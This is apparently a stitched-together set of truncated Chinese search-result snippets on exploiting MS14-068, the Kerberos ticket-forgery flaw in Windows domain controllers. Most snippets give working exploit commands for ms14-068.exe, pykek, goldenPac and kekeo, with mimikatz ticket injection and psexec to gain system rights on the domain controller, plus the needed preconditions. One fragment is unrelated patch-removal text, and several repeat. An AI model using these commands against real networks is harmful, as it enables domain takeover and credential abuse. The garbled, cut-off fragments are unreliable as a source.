ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16...
psexec64.exe \\mstest.mark.com cmd.exe就能回来域控的cmd PTT攻击 上面的ms14-068是一种漏洞,通过伪造域管理员的TGT然后达到身份认证为域控身份,同样也是一种票据传递,是权限提升的一种,PTT的利用主要还是用于权限维持 实验:使用kekeo工具进行票据传递攻击演示 下载:https://github.com/gentilkiwi/kekeo/release...
MS14-068.exe-u<userName>@<domainName>-p<clearPassword>-s<userSid>-d<domainControlerAddr> 代码语言:javascript 代码运行次数:0 运行 AI代码解释 MS14-068.exe-u douser@demo-sS-1-5-21-979886063-1111900045-1414766810-1107-d192.168.183.130-p Dotest123 这里获取到一个TGT_douser@demo.com.ccache文件...
删除信息 使用“控制面板”中的“添加或删除程序”项或位于 %Windir%\$NTUninstallKB3011780$\Spuninst 文件夹中的 Spuninst.exe 实用工具 文件信息 请参见“文件信息”部分。 注册表项验证 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP3\KB3011780\Filelist Windows Vista(所有版本)引用表...
它是MS14-068+psexec的组合,因此使用起来非常放方便快捷,一条命令可拿到system权限。 利用: goldenPac.exe 域名/域用户名:域用户明文密码@域控完整域名 条件: 1、获取域普通用户的账号密码 2、获取域普通用户的sid 3、服务器未打KB3011780补丁 4、需要远程桌面(使用这个工具,运行了一条命令后,如果成功则会拿到...
使用方法: ms14-068.exe -u 域成员名@域名-s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 代码语言:javascript 代码运行次数:0 运行
ms14-068.exe 03以上服务器或pc 0x02 模拟环境 域控制器 2008r2 192.168.3.100 域内机器 2008r2 192.168.3.10 0x03 漏洞自检 MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测 systeminfo |find "3011780" 1. 为空则代表没有打该补丁,存在漏洞!
ms-14-068.exe -u 域用户@域控名 -p 域用户密码 -s 域用户sid -d 域ip 利用mimikatz.exe将证书写入,从而提升为域管理员 kerberos::ptc 你的证书名字 写入成功后,使用PsExec.exe以管理员权限运行连接域控 原理解析 0x04 Kerberos流程 域内主机请求处理流程 ...
使用ms14-068来产生一张高权限的berberos服务票据,并注入到内存中: ms14068.exe /domain:xxx.com /user:jack /password:jackpwd/ /ptt 再测试访问: 测试psexec无密码登陆 很棒,达到了我们想要的效果。 如果想生成一张kerberos票据,做票据传递攻击(ptt),可以这样: ...
使用ms14-068来产生一张高权限的berberos服务票据,并注入到内存中: ms14068.exe /domain:xxx.com /user:jack /password:jackpwd/ /ptt 再测试访问: 测试psexec无密码登陆 很棒,达到了我们想要的效果。 如果想生成一张kerberos票据,做票据传递攻击(ptt),可以这样: ...